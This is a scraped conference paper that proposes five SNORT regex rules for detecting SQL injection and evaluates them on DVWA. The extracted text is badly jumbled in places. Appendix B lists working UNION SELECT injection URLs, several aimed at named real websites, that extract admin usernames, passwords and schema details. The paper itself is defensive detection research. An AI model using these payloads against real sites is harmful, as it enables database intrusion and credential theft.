See

discussions, stats, and author profiles for this publication at: https://www.researchgate.net/publication/278677876

Detecting SQL injection attacks using SNORT

IDS

Conference Paper · November 2014

DOI: 10.1109/APWCCSE.2014.7053873

CITATIONS READS

0 1,683

3 authors, including:

Md Rafiqul Islam Quazi Mamun

Charles Sturt University Charles Sturt University
90 PUBLICATIONS 451 CITATIONS 62 PUBLICATIONS 150 CITATIONS

SEE PROFILE SEE PROFILE

All content following this page was uploaded by Quazi Mamun on 18 June 2015.

The user has requested enhancement of the downloaded file. All in-text references underlined in blue are added to the original document
and are linked to publications on ResearchGate, letting you access and read them immediately.
 Detecting SQL Injection Attacks Using SNORT IDS
Hussein Alnabulsi Md Rafiqul Islam
School of Comp & Mathematics School of Comp & Mathematics
Charles Sturt University, Charles Sturt University,
Albury, NSW,Australia Albury, NSW, Australia
halnabulsi@csu.edu.au mislam@csu.edu.au
Abstract—SQL injection attack poses a serious security
threats among the Internet community nowadays and it’s
continue to increase exploiting flaws found in the Web
applications. In SQL injection attack, the attackers can take
advantage of poorly coded web application software to introduce
malicious code into the system and/or could retrieve important
information. Web applications are under siege from cyber
criminals seeking to steal confidential information and disable or
damage the services offered by these application. Therefore,
additional steps must be taken to ensure data security and
integrity of the applications. In this paper we propose an
innovative solution to filter the SQL injection attack using
SNORT IDS. The proposed detection technique uses SNORT tool
by augmenting a number of additional SNORT rules. We
evaluate the proposed solution by comparing our method with
several existing techniques. Experimental results demonstrate
that the proposed method outperforms other similar techniques
using the same data set.
Keywords—SQL Injection, SNORT, Intrusion detection,
topology.
I. INTRODUCTION
The Internet has rapidly become an integral part of
everyday life and our reliance on it is expected to continue to
grow. However, its rapid adoption has also left it susceptible
to misuse and/or abuse. Along with the growth of the Internet,
there has been a dramatic growth in SQL Injection Attack
(SQLIA) [1]. It is a major concern that despite the increasing
development of IDS (Intrusion detection system) and
antimalware services and technologies, the volume of SQLIA
continues to grow day by day [1]. Therefore, effective and
efficient detection techniques are of critical importance to the
computer user community. Over the last decade, researchers
have adopted a diversity of solutions in order to control the
SQLIA [1, 2, 3, 13, 14, 15, 6 &16]. SQLIA is one of the most
devastating techniques for stealing data from backend. It also
has been argued that SQLIA comes under the top ten security
threats in web applications [6]. Using this kind of attack an
attacker can get access to the database and steal classified
information. The concept of IDS was initially appeared in
James Anderson’s technical report [2] in 1980. This first
generation IDS could monitor, audit, and log an attacked
machine. The main task was to search the audit logs for
predefined patterns of a suspicious activity [2]. Most IDSs are
reliable in detecting suspicious actions by evaluating TCP/IP
connections or log files, when the IDS finds a suspicious
Quazi Mamun
School of Comp & Mathematics
Charles Sturt University,
Wagga Wagga, NSW, Australia
qmamun@csu.edu.au
action, it creates an alert which contains information about the
source, target, and preview type of the attack SNORT is one of
the effective and a popular rule based Network Intrusion
Detection System (NIDS) tools to identify intrusion attacks
[3]. It is an open-source software developed by Martin Roesch
[3], and it uses regular expression-based rules for intrusion
detection. SNORT is a packet sniffer that monitors network
traffic in real time and supports protocols including TCP,
UDP, IP and ICMP [3]. It verifies each packet closely to
detect a unsafe payload or suspicious anomalies. When a
suspicious behavior is identified, SNORT immediately
generates a real-time alert by logging it to the alert file, and/or
activating a popup window. SQL Injection and XSS (Cross-
site scripting) are the most common and serious web
application vulnerabilities threatening the privacy and security
of both clients and applications nowadays [6]. It causes
serious threats among the Internet user community due to its
recent dynamic attack patterns [10]. The current IDS are not
sufficient to prevent or generate real-time security alerts to the
users [8]. It has been investigated how SQL injection attacks
are conducted and how hackers use SQL injection to attack
web applications [9]. To mitigate this problem, developers
have proposed a range of coding guidelines that promote
defensive coding practices, such as encoding user input and
validation [6]. Researchers also proposed many vulnerability
detection approaches such as static taint analysis [4] and
conolic testing [5], however, these techniques suffer from high
FP (false positive) instances.
Conversely, there are many types of SQLIAs and its
numerous variations of its basic types. However, researchers
are often unaware about its variations, and most of their
proposed solutions detect or prevent only a subset of the
possible SQLIAs. Therefore, it has become a challenge for the
research community to develop an active defense technique
against the SQL Injection and XSS attack. Keeping this in
mind, we have investigated several alternatives for SNORT
rules and evaluate its performances. Based on our
investigations, we propose a set of rules for SNORT tool. Our
empirical performance shows that our technique outperforms
with similar existing techniques using similar data set.
The main contributions of this paper are three folds:
A. Analyses the SNOT IDS and propose five different
snort rules.
 B. Apply the proposed SNORT rules in our experiment
for detection evaluation.
C. Apply our method on Damn Vulnerable Web
Application (DVWA) to evaluate the performance.
The rest of the paper organized as follows: section 2
discusses the related work, section 3 outlines the problem
statement, section 4 discusses the proposed SNORT rules and
section 5 demonstrates the experimental setup and results.
Finally the paper concludes with discussion and conclusion.
II. RELEATED WORK
In [11] Veerman and Oprea present different SQL Injection
attacks and their solutions based on SNORT tool. They also
proposed a method that is used by many organizations who
wish to leverage their IDS experiences. They captured some
SQL Injection attack patterns, however, their attack patterns
are only extracts signature-based features which can’t offer
protection against more recent attacks. Their approach can
detect insider attacks upto 70% of all database attacks (such as
resource exhaustion, password attack), malware attack (such
as viruses, worms, Trojan horses).
Warneck [12] uses many ways for defeating the SQL
injection attack to prevent the vulnerabilities related to web
attacks by using SNORT tool for detecting various types of
SQL injection attacks both in the database level, and the web
application level.
Dabbour et. al., [13] presented three types of attacks, such
as SQL injection attacks, XSS (Cross Side Scripting) attacks,
and command execution attacks. They also use SNORT IDS
for detection and Damn Vulnerable Web Application
(DVWA) for evaluating and testing the SNORT rules.
Deuble [15] investigates how to alert and detect an SQL
injection, XSS, query command injection, and OS command
injection attacks on web applications using SNORT tools.
They use Samurai WTF (Web Testing Framework)
distribution, Damn Vulnerable Web Application (DVWA),
and Security Onion instances for SNORT, in their
experimental process.
Mookhey et., al., [14], present SNORT tools for detecting
SQL injection and XSS attacks. They implemented web attack
detection using ID3 which is an algorithm that uses greedy
approach by selecting the best attribute to split the dataset on
each iteration. Out of 1771 generated attacks they were able to
detect 1282 attacks successfully.
It is obvious from the literature that none of the existing
techniques can offer a complete solution to protect the user as
well as web application from SQLIA. Therefore, it is an open
challenge to the researcher to find an optimum solution against
the SQLIA.
III. PROPOSED APPROACH USING SNORT IDS
This section provides our propose method based on
SNORT IDS. In our previous work [7], we present the basic
architecture of SNORT modules as illustrated in Figure 1.
Fig. 1. SNORT architecture [7].
According to Fig. 1, SNORT modules perform the
following tasks:
A. Packet Capture Module.
This module is built on the popular packet programming
library libpcap, which provides implementation independent
access to the packet capture facility provided by the operating
system, to provide a high-level interface to capture packets.
B. Decoder.
This module dissects the captured packets into various
data structures and identifies the links to be checked in the
next module, such as suspicious connection attempts to some
TCP/UDP ports, or too many packets sent in a short period.
C. Preprocessors.
SNORT's preprocessors fall into two categories. They can
be used to either examine packets for suspicious activity or
modify packets so that the next module can properly interpret
them. The other preprocessors are responsible for categorizing
traffic so that the next module can accurately match
signatures. These preprocessors defeat attacks that attempt to
evade SNORT's detection engine by manipulating traffic
patterns.
D. Detection Engine.
This module uses the detection plug-ins, and matches the
packets against rules loaded into memory during SNORT
initialization.
E. Detection Plug-ins.
The detection plug-in definition is in the rules files. They
are used to identify patterns.
F. Rules Files.
These are text files containing a list of rules with a known
syntax. The syntax includes protocols, addresses, and some
other important data.
G. Output Plug-ins.
This module formats the notifications (alerts, logs) for the
user to access them in many ways (databases, console, and
external files) [7].
IV. PROPOSED SNORT RULES
In this section we are proposing some new SNORT rules
for detection of SQLIA. In our proposed rules, we used some
signature words, these are ((OR%20), (OR+), (%0A), (OR/*),
(LIKE), (CONCAT), ((VERSION), (HOSTNAME),
(DATADIR), and (UUID)) with all of their possible values in
hexadecimal values for capital and small letters.
A. Rule #1
alert tcp any any -> any $HTTP_PORTS (msg:"SQL
Injection – Start Attacks1…… - SQL";
pcre:"/((((((\%6f)|(o)|(\%4f))((\%52)|(r)|(\%72))(%20))|(((\%6f
)|(o)|(\%4f))((\%52)|(r)|(\%72))((%2b)|(\+))))
|((\%0a))|(((((\%6f)|(o)|(\%4f))((\%72)|(r)|(\%52))((\/)|(\%2f))(
(\*)|(\%2a)))))|(((((\%4c)|(l)|(\%6c))((\%69)|(i
)|(\%49))((\%6b)|(k)|(%4b))((\%65)|(e)|(\%45)))))|(((((\%63)|(c
)|(\%43))((\%6f)|(o)|(\%4f))((\%6e)|(n)|(\%4
e))((\%63)|(c)|(\%43))((\%61)|(a)|(\%41))((\%74)|(t)|(\%54))((\
%76)|(v)|(\%56))((\%65)|(e)|(\%45))((\%72)|
(r)|(\%52))((\%73)|(s)|(\%53))((\%69)|(i)|(\%49))((\%6f)|(o)|(\
%4f))((\%6e)|(n)|(\%4e)))|(((\%68)|(h)|(\%48)
)((\%6f)|(o)|(\%4f))((\%73)|(s)|(\%53))((\%74)|(t)|(\%54))((\%
6e)|(n)|(\%4e))((\%61)|(a)|(\%41))((\%6d)|(m)
|(\%4d))((\%65)|(e)|(\%45)))|(((\%55)|(u)|(\%75))((\%55)|(u)|(\
%75))((\%49)|(i)|(\%69))((\%44)|(d)|(\%64)))
|(((\%64)|(d)|(\%44))((\%61)|(a)|(\%41))((\%74)|(t)|(\%54))((\
%61)|(a)|(\%41))((\%64)|(d)|(\%44))((\%69)|(i
)|(\%49))((\%72)|(r)|(\%52)))))))/i"; classtype: Web-
application-attack; sid:9383; rev:19;)
This rule will able to detect all of these the signature words
((OR%20), (OR+), (%0A), (OR/*), (LIKE),
(CONCAT)) with all of their possible values in hexadecimal
values for capital and small letters.
B. Rule #2
Signature words are ((OR%20), (OR+), (%0A), (OR/*),
(LIKE), (CONCAT), (VERSION), (HOSTNAME),
(DATADIR), and (UUID)). The proposed Second rule is:
alert tcp any any -> any $HTTP_PORTS (msg:"SQL Injection
– Start Attacks1…… - SQL";
pcre:"/(\'%20or)|(\%27\%20or)|(\%27\%20\%6f%72)|(\%27\%
20\%6f%52)|(\%27\%20\%4f%72)|(\%27\%
20\%4f%52)|(\%27\%20\O%52)|(\%27\%20\%4fR)|(\%27\%2
0\%6fR)|(\%27\%20\O%72)|(\%20or)|(\%20\
%6f%72)|(\%20\%6f%52)|(\%20\%4f%72)|(\%20\%4f%52)|(\
%20\O%52)|(\%20\%4fR)|(\%20\%6fR)|(\%
20\O%72)|(\%0aor)|(\%0a\%6f%72)|(\%0a\%6f%52)|(\%0a\%
4f%72)|(\%0a\%4f%52)|(\%0a\O%52)|(\%0a
\%4fR)|(\%0a\%6fR)|(\%0a\O%72)|(\*%2for)|(\*/\or)|(\%2a/\o
r)|(\%2a%2for)|(\%2a%2f\%6f%72)|(\%2a%
2f\%6f%52)|(\%2a%2f\%4f%72)|(\%2a2f\%4f%52)|(\%2a%2f
\O%52)|(\%2a%2f\%4fR)|(\%2a%2f\%6fR)|(
\%2a%2f\O%72)|(like)|(\%6c\%69\%6b\%65)|(\%4c\%49\%4
b\%45)|(concat)|(\%63\%6f\%6e\%63\%61\
%74)|(\%43\%4f\%4e\%43\%41\%54)|(version)|(\%76\%65\%
72\%73\%69\%6f\%6e)|(\%56\%45\%52\%5
3\%49\%4f\%4e)|(hostname)|(\%68\%6f\%73\%74\%6e\%61\
%6d\%65)|(\%48\%4f\%53\%54\%4e\%41\
%4d\%45)|(uuid)|(\%55\%55\%49\%44)|(\%75\%75\%69\%6
4)|(datadir)|(\%64\%61\%74\%61\%64\%69\
%72)|(\%44\%41\%54\%41\%44\%49\%52)//i"; classtype:
Web-application-attack; sid:9383; rev:19;)
C. Rule-3
We propose third SNORT rule to detect all tries to enter
the pages that connected with a database of the website. These
pages contain a question mark sign “?” in their URL. So by
using this SNORT rule we will detect the methods of writing
SQL injection queries. Third SNORT rule is as:
alert tcp any any -> $HOME_NET any (msg:"SQL Injection
Attacks -?-"; pcre:"/(\%3f)|(/?)/ix";
classtype:web-application-attack; sid:1100; rev:21; )
This rule will prevent every SQLIAs with little command line.
This rule also identifies the attack, when the attacker tries to
SQL injection for Web site connected to a Database. The
following example shows a target vulnerable Website has a
Question mark [?] in its URL:
http://www.unitedpurpose.org/archive/article.php?id=-
100%20union%20select
%20%20%201,2,3,id,5,6,7,8,9,10,11,12,13%20from%20chapt
ers%20where%20id=1%20or%201=1—
D. Rule #4
The fourth SNORT rule is proposed only for one statement
signature called (UNION SELECT) and with all of its possible
values in hexadecimal form, no matter how many characters
between these two words (UNION SELECT). We used code
signature ( [^\n]* ) in our rules, which mean any character(s)
between these two words i.e. (UNION SELECT).
alert tcp any any -> any $HTTP_PORTS (msg:"SQL Injection
– Start Attacks4…… - SQL";
pcre:"/((((\%55)|(u)|(\%75))((\%4e)|(n)|(\%6e))((\%69)|(i)|(\%
49))((\%6f)|(o)|(\%4f))((\%4e)|(n)|(\%6e)))[^\
n]*(((\%73)|(s)|(\%53))((\%65)|(e)|(\%45))((\%6c)|(l)|(\%4c))((
\%65)|(e)|(\%45))((\%63)|(c)|(\%43))((\%74)|(t)|(\%54))))/i";
classtype: Web-application-attack; sid:9397; rev:28;)
E. Rule #5
alert tcp any any -> any $HTTP_PORTS (msg:"SQL
Injection – Start Attacks4…… - SQL";
flow:established,to_server;
pcre:"/((\?)[^\n]*(\=)[^\n]*((\%55)|(u)|(\%75))((\%4e)|(n)|(\%6
e))((\%69)|(i)|(\%49))((\%6f)|(o)|(\%4f))((\%4e)|(n)|(\%6e)))/i"
; classtype: Web-application-attack; sid:9397; rev:28;)
This proposed SNORT rule is detecting just ( ? = UNION )
statement signature with all of its possible values in
hexadecimal values for capital and small letters with any
characters between these three characters and words ( ? = TABLE I. EXPERIMENTAL RESULTS
UNION ). We used this code signature ( [^\n]* ) which mean Rule False False Precision Recall
any characters between these three characters and words ( ? = Number Positive Negative Rate Rate
UNION ). It’s almost impossible that a normal legitimate user Rule 1 15 0 1 0.7540
or Webpages use these three words together in the Webpages. Rule 2 15 12 0.7391 0.6938
Only the attacker could use these three characters and words Rule 3 17 0 1 0.7301
(? = UNION) for SQL Injection Attacks. Rule 4 4 0 1 0.9387
The drawback for this SNORT rule is the speed. This Rule 5 0 0 1 1
SNORT rule is slow, because we used “PCRE” for detection,
and if we want to consider the speed in our research study, it is
better to use “content” or “uricontent” with the “PCRE” in VI. DISCUSSION
SNORT rules to have faster SNORT rules for detection. So the In this paper we have proposed five SNORT rules to detect
proposed SNORT rule will be after adding “uricontent” with SQLIAs. We have demonstrated our method using our own
“PCRE”: alert tcp any any -> any $HTTP_PORTS (msg:"SQL data set and results are presented in Table 1. Is has been
Injection – Start Attacks4…… - SQL"; shown from Table 1 that our proposed rules shows improved
flow:established,to_server; uricontent:"?"; uricontent:"="; performance in terms of precision and recall, in particular rule
uricontent:"union"; nocase; 5 shown 100% detection accuracy which is significant. Also
pcre:"/((\?)[^\n]*(\=)[^\n]*((\%55)|(u)|(\%75))((\%4e)|(n)|(\%6 our forth SNORT rule gives precision rate= 0.9387 and recall
e))((\%69)|(i)|(\%49))((\%6f)|(o)|(\%4f))((\% rate=1, and the other rules give a comparable results also.
4e)|(n)|(\%6e)))/i"; classtype: Web-application-attack; From Table 1, it is clear that rul qe 1, 2 and 3 show some
sid:9397; rev:28;) FP instances. It is because the presence of the works ((OR),
If the signature words or characters for the SNORT rule (LIKE), (CONCAT)), when a user connect to the WebPages
are more than one word or characters, and the SNORT rule or the WebPages itself have similar words in their URL. Also,
detect these signature words or characters together, not it is common for the user to type a question mark sign [?], or
everyone alone, it will produce a SNORT rule with a very low the WebPages could have a Question mark sign [?] in their
value of false positive (false alarm). URL. However, the false negative for rule 1 & 3 is zero.
V. EXPERIMENTAL SETUP Another drawback for rule 4 is slow processing due to the use
of “PCRE” in the detection process, which we already
This section describes our experimental setup and discussed in section 4.
classification process. This section consists of three sub-
sections:
A. Comparison with similar existing techniques
A. Data set
We have compared our result with similar existing works. The
In our experiment, we have used our own data collected following table shows the comparative study with other works
from diverse websites - both from normal websites and in terms of Precision and Recall rate.
injected websites. In our data set, we used 46 examples of
SQL injection attacks and 114 normal websites. The normal
websites examples showed in Table 3 in appendix A, and the TABLE II. SUMMARY TABLE FOR COMPARING STUDY
vulnerable website examples shown in Table 4 in appendix B.
Existing works. Precision Rate Recall Rate
B. Experiment Dabbour, el at. (2013) 1 0.1921
The methodology of our experiment summarizes the major Deuble, (2012) 0.9545 0.9121
steps to accomplish the result. We used SNORT tool under Warneck, (2007) 1 0.1372
Linux operating system to detect SQL injection attacks, we Mookhey, el at. (2007) 1 0.1941
used DVWA (Damn Vulnerable Web Application) for testing, Veerman, el at. (2012) 1 0.0208
DVWA is a web server so we insert malicious SQL injection Our First SNORT Rule 1 0.7540
attacks to vulnerable web server that we built using DVWA, Our Second SNORT Rule 0.7391 0.6938
then we see if the SNORT rule can detect every SQL injection
Our Third SNORT Rule 1 0.7301
attacks inserted to the vulnerable web server.
Our Fourth SNORT Rule 1 0.9387
C. Results Our Fifth SNORT Rule 1 1
Table 1 shows the testing results of our experiment. It has
It is obvious from the above Table 2 that our proposed
been shown that the proposed rule 5 sows best result in all
rules outperform with similar existing techniques, which
parameters i.e. FP, FN, Precision and Recall. The precision
justifies the scalability of our method. However, one of the
rate is good for all rules except rule 2 and there are some false
problems we have faced related to data access of web
negative instances. applications which exploiting these vulnerable by hackers are
SQL injection vulnerabilities, and XSS vulnerabilities. We
used SNORT as IDS because of its good reputation in
intrusion detection system for these types of attacks (SQL [16] A. Deuble, “Detecting and Preventing Web Application Attacks with
injection, and XSS) and we succeed to have very good results Security Onion”, SANS Institute,Vol. 4, Issue 1,pp. 26-33, 26 July
2012.
for detecting SQL injection attacks using SNORT IDS.
Appendix A
VII. CONCLUSION
TABLE III. THE NORMAL WEBSITES EXAMPLES
In this paper, we propose a number of SNORT rules to
detect SQLIAs. The SNORT rules we present show a http://www.tango04.com
http://www.evt-me.com/
significant improvement in performance in detecting SQL http://www.garaanews.com/jonews/garaanews-9/66185.html
injection attacks. In some cases the proposed rules perform http://schulich.technion.ac.il
100% success in detection with zero false alarm, in particular http://www.hds.com/products/storage-systems/hitachi-unified-storage-100-
rule 5 (Table 1). family.html
http://www.dutchtub.com/
However, some of our rules show some FP and FN http://aid.dfat.gov.au/australiaawards/pages/studyin.aspx
instances, which we discussed in the discussion section. http://www.avicom.co.il/
http://www.unionselectacademy.com
In our future work we are planning to use more data set http://www.motherwiseyoga.com/
with diverse feature set extraction and selection to test our http://www.harrisburgu.net/
rules. http://www.sans.org/
http://www.saveoureverglades.org/
http://stackoverflow.com
References www.concat.com.au
[1] P. Kumar, “R.K.A survey on SQL injection attacks, detection and http://au.urlspy.co
prevention techniques”, First International Conference, pp.1-5, 2012. https://www.owasp.org/index.php/SQL_Injection
[2] U. Aickelin, J. Twycross and T. HeskethRoberts, “Rule Generalisation http://www.worldmissphotogenic.com/
using Snort”, International Journal of Electronic Security and Digital http://ar.wikipedia.org
Forensics (IJESDF), Volume 1, Issue 1, pp. 101-116, January 2007. http://www.wichitafallscommerce.com/
[3] S. Eckmann, "Translating Snort rules to STATL scenarios", In Proc. http://www.pornkruba.net/ http://emedicine.medscape.com/artic
Recent Advances in Intrusion Detection, pp. 1-13, October 2001. le/779218-overview
http://www.dutchiefanclub.com
[4] J. Demšar, “Statistical comparisons of classifiers over multiple data
http://www.unitedpurpose.org/
sets”, Journal of Machine Learning Research, Vol. 7, pp. 1-30, January
2006. http://www.plusline.org
http://www.slideshare.net/
[5] A. Kieżun, P. Guo, K. Jayaraman, and M. Ernst, “Automatic creation of
http://en.wikipedia.org/wiki/SQL_injection
SQL injection and cross-site scripting attacks”, International
Conference on Software Engineering, Vol. 46, Issue 3, pp. 69-77, 2009. https://www.os3.nl
http://defcon.org/
[6] M. Howard and D. LeBlanc, “Writing Secure Code”, Microsoft Press, http://www.bluecusa.com/
Redmond, Washington, second edition,Vol. 45, Issue 2, pp. 66-72,
http://www.yoquierogames.com/
2003.
https://wumt.westernunion.com/info
[7] H. ALNabulsi, I. Alsmadi, M. Al-Jarrah, “Textual Manipulation for /homePage.asp?country=JO&origin ation=US
SQL Injection Attacks”, In. J. of Computer Network and Information http://www.thuasne.co.il
Security (IJCNIS), Volume 1, Issue 1, pp.26-33, 2014.
https://www.youversion.com/
[8] Miguel A. Calvo Moya, "Analysis and Evaluation of the SNORT and http://us.mc1645.mail.yahoo.com/mc/welcome?.gx=1&.tm
Bro Network Intrusion Detection Systems", Ph.D. dissertation, http://www.google.jo
Comillas Pontifical University, Dept. BSC, September 2009.
http://www.sizzla.org/
[9] Y. Wang, Z. Li, "SQL Injection Detection with Composite Kernel in http://www.dioceseduluth.org/
Support Vector Machine ", International Journal of Security and Its http://www.like.com.my
Applications Vol. 6, No. 2, April 2012. http://www.kalonjirecords.com
[10] S. Patil, N. Karhade, Y. Kothekar, "Honeyweb: a web-based high http://www.positivenetworks.com
interaction client honeypot", International Journal of Engineering https://login.live.com/login.srf?wa=
Research and Applications (IJERA), Vol. 2, Issue 5, pp.1695-170, wsignin1.0&rpsnv=11&ct=1367693
March 2012. 893&rver=6.1.6206.0&wp=MBI&w
[11] Z. Xin-hua, W. Zhi-jian, “A Static Analysis Tool for Detecting Web reply=http:%2F%2Fmail.live.com%
Application Injection Vulnerabilities for ASP Program”, IEEE, Vol.1, 2Fdefault.aspx&lc=1033&id=64855&mkt=en-us&cbcxt=mai&snsc=1
Issue 1, pp.127-13, 2010 https://donate.wikimedia.org/w/inde
[12] G. Veerman, R. Oprea, “Database SQL Injections Detection & x.php?title=Special:FundraiserLandi
Protection”, University van Amsterdam, May 30, 2012. ngPage&country=JO&uselang=en&
[13] B. Warneck, “Defeating SQL Injection IDS Evasion”, SANS Institute, utm_medium=sidebar&utm_source
Vol. 1, Issue 4, pp. 16-30, January 2007. =donate&utm_campaign=C13_en.wikipedia.org /
http://www.youtube.com/watch?v=VZm43VL7MIA
[14] M. Dabbour, I. Alsmadi and E. Alsukhni, ”Efficient Assessment and
Evaluation for Websites Vulnerabilities Using SNORT”, Vol. 7, No. 1, http://www.marmoon.com
January 2013. http://bayareasilencetheviolence.org
http://www.unionselect.com/Union_Select_Basketball
[15] K. K. Mookhey, Nilesh Burghate, "Detection of SQL Injection and
/Welcome_to_Union_Select_Basketball.html
Cross-site Scripting Attacks”, SecurityFocus Infocus article, Created
March 2004, Vol. 1, Issue 2, pp. 292–302, Updated Nov 2010. http://www.foldingbikechallenge.com/
http://www.irrawaddy.org/
http://www.ellabakercenter.org/
http://www.linux-tutorial.info/ Appendix B
http://www.qualitystone.info
http://pro-stance.com/
http://www.medicinenet.com/hemolytic_uremic_syndrome/article.htm
TABLE IV. THE SQL INJECTION ATTACKS EXAMPLES
http://www.hus.fi/Sivut/default.aspx
http://concat.com/?nr=0 http://www.web.com/index.php?id=-1 union select
http://www.adit-uae.com/ 1,2,3,4,5,6—
http://www.cc.gatech.edu http
http://www.concat.com.au Webpage?subcatid=40%20union%20select%20fld_pass
http://www.e-hatzvi.co.il/ word,2,3,4,5,6%20from%20tbl_admin%20where%20fld
http://version.com/ _password%20=%20null%20or%201%20=%201
http://www.petri.co.il/
http://www.snort.org/ Webpage?subcatid=40%20union%20select%20group_c
http://www.cccp.com/ oncat(column_name)-,2,3,4,5,6%20from%20information_schema.columns%2
https://www.owasp.org/ 0where%20table_schema=database()—
http://meidafon.co.il/
http://www.art-time.co.il/ http://www.web.com/index.php?id=-1 union select
http://www.like.com.my 1,group_concat(table_name),3,4,5,6 from
http://www.new144.co.il/ information_schema.tables where table_schema=database()--
http://www.ukgraffiti.com http://www.web.com/index.php?id=-1 union select
http://www.hostname.com/ 1,@@version,3,4,5,6—
http://www.famkruithof.net/guo.html
http://www.unitedpurpose.org/archive/article.php?id=-
http://hebron.org.il/
100%20union%20select%201,2,3,group_concat(table_n
http://map.technion.ac.il
ame),5,6,7,8,9,10,11,12,13%20from%20information_sc
http://www.gday.co.il/ hema.tables%20where%20table_schema=database()—
http://www.improvtheater.co.il/
http://sis.yu.edu.jo/pls/yuapps/f?p=134:101:62581894471 http://www.web.com/index.php?id=-1 union select
http://www.garo.cc/ 1,concat(database()),3,4,5,6
http://us.mc1645.mail.yahoo.com/mc/welcome?.gx=1&.tm
http://www.europe-re.com/ Webpage?subcatid=40%20union%20select%20fld_pass
http://www.springer.com/computer/lncs?SGWID=0-164-6-791222-0 word,2,3,4,5,6%20from%20tbl_admin%20where%20fld
https://www.positivenetworks.com/ _password%20=%20''%20or%201%20=%201
http://www.website-designlincolnshire.co.uk/
http://game.thai4promotion.com/ http://www.web.com/index.php?id=-1 union select 1,
http://www.lovemarks.com/ group_concat(column_name),3,4,5,6 from
http://www.sensordynamics.cc/ information_schema.columns where table_name=admin—
http://www.turkey-re.com/
http://marc.info/?l=snortusers&m=132741211804793 http://www.web.com/index.php?id=-1 union select
http://www.kbs-spritztechnik.de/ 1,group_concat(column_name),3,4,5,6 from
http://www.holland-real-estate.net/ information_schema.columns where table_name=0x61646d696—
http://www.intermaritimeservices.com
http://www.eleganthomesinwesttoronto.com http://www.telesensory.com/product.aspx?category=por
http://www.likeboot.com/Pages.asp?id=23 table&id=-1%20union%20all%20select%201,group_concat%28col
http://www.solutionfocusedtrainers.co.uk/ umn_name%29,3,4,5,user%28%29,7,8,database%28%2
http://www.waterloo.k12.ia.us/ 9,10,11,12,13,14,15,16,17,18%20from%20information_
schema.columns%20where%20table_schema=database%28%29—
https://weboutlook.csu.edu.au
https://www148.griffith.edu.au/programscourses/
http://www.garo.cc/text.php?pageid=16%20union%20se
Program/OverviewAndFees?ProgramCode=6003
lect%201,group_concat(column_name)-
www.youtube.com/watch?v=lVtkwWUBZ7Q
,3,4,5,6,7,8,9%20from%20information_schema.columns
https://www.youversion.com/
%20where%20table_schema=database()—
http://www.rauchfrei2008.de/
http://campusteva.tau.ac.il http://www.marmoon.com/games.php?id=-
http://tasp.technion.ac.il/ 437%20union%20select%201,2,3,group_concat(table_n
https://www.google.jo/webhp?hl=ar&tab=ww ame),5,6,7,8,9,10,11,12,13%20from%20information_sc
http://www.loveplace.co.il/ hema.tables%20where%20table_schema=database()—
http://www.elistein.co.il
https://www.facebook.com/hussein.alnabulsi?ref=tn_tnmn Webpage?subcatid=-40%20union%20select%20@@VERSION,2,3,4,5,6--
http://www.tamar.co.il/ http://www.web.com/index.php?id=-1 union select 1,
http://www.sabayacafe.com/ group_concat(schema_name),2,3,4,5,6 from information_schema.schemata—
http://optrade.co.il/
http://www.ncbi.nlm.nih.gov/pubmedhealth/PMH0001539/ Webpage?subcatid=-
http://www.skyportal.co.uk 40%20union%20select%20@@HOSTNAME,2,3,4,5,6--
http://www.likeboot.com/Pages.asp?id=23 http://www.web.com/index.php?id=-1 union select1,2,
http://youronesourcefitness.com group_concat(admin_name,0x3a,password),4,5,6 from
http://www.slideshare.net/ admin—
http://www.itour.co.il
Webpage?subcatid=40%20union%20select%20fld_pass
word,2,3,4,5,6- %20from%20tbl_admin%20where%20fld_usrname+or
+1=1
Webpage?subcatid=40%20union%20select%20fld_pass
word,2,3,4,5,6-
%20from%20tbl_admin%20where%20fld_password%2
0=%20null%20or%20'value'='value'
http://www.unitedpurpose.org/archive/article.php?id=-
100%20union%20select
%20%20%201,2,3,id,5,6,7,8,9,10,11,12,13%20from%2
0chapters%20where%20id=1%20or%201=1—
http://www.vize.cz/en/news.php?id=-
99%20UNION%20SELECT%201,group_concat(table_
name),3,4,5,6%20from%20information_schema.tables
%20where%20table_schema=database()—
http://www.marmoon.com/games.php?id=-
437%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13—
Webpage?subcatid=40%20union%20select%20fld_pass
word,2,3,4,5,6-%20from%20tbl_admin%20where%20fld_password%2
0=%20null%0aor%0a'value'%3d'value'%3b%23
Webpage?subcatid=40%20union%20select%20fld_pass
word,2,3,4,5,6-
%20from%20tbl_admin%20where%20fld_password%2
0=%20null%20/******************/or/***********
*******/1=1/**********/;/**/
http://www.unitedpurpose.org/archive/article.php?id=-
100%20union%20select%20%20%201,2,3,id,5,6,7,8,9,
10,11,12,13%20from%20chapters%20where%20id=1%
20or%201=1—
Webpage?subcatid=40%20union%20select%20fld_pass
word,2,3,4,5,6-
%20from%20tbl_admin%20where%20fld_password%2
0=%20null%20or%201%20like%201
http://www.marmoon.com/games.php?id=-
437%20union%20select%201,2,3,group_concat(admin,
0x3a,pass),5,6,7,8,9,10,11,12,13%20from%20admin
Webpage?subcatid=40%20union%20select%20fld_pass
word,2,3,4,5,6-
%20from%20tbl_admin%20where%20fld_usrname%20
LIKE%20'a%'
http://www.eliteco-jo.com/elite/news_dtls.php?nid=-
1%20union%20select%201,2,group_concat(job_no,0x3
a,user_id),4,5,6,7,8,9,10,11,12,13%20from%20compan
y_jobs
Webpage?subcatid=40%20union%20select%20fld_pass
word,2,3,4,5,6-
%20from%20tbl_admin%20where%20fld_usrname%20
LIKE%20'%d%'
www.telesensory.com/product.aspx?category=portable
&id=-
1%20union%20all%20select%201,version%28%29,3,4,
5,6,7,8,9,10,11,12,13,14,15,16,17,18—
Webpage?subcatid=40%20union%20select%20fld_pass
word,2,3,4,5,6-%20from%20tbl_admin%20where%20fld_usrname%20
xor%201=1
http://www.telesensory.com/product.aspx?category=por
table&id=-1%20union%20all%20select%201,@@datadir,3,4,5,6,7
,8,9,10,11,12,13,14,15,16,17,18—
http://www.eliteco-jo.com/elite/news_dtls.php?nid=-
View publication stats
1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13—
http://www.telesensory.com/product.aspx?category=por
table&id=-
1%20union%20all%20select%201,2,3,4,5,group_concat
%28name,0x3a,pswd%29,7,8,9,10,11,12,13,14,15,16,17
,18%20from%20admin—
Webpage?subcatid=40%20union%20select%20group_c
oncat(fld_usrname,0x3a,fld_password),2,3,4,5,6%20from%20tbl_admin
Webpage?subcatid=40%20union%20select%20group_c
oncat(table_name),2,3,4,5,6%20from%20information_s
chema.tables%20where%20table_schema=database()—
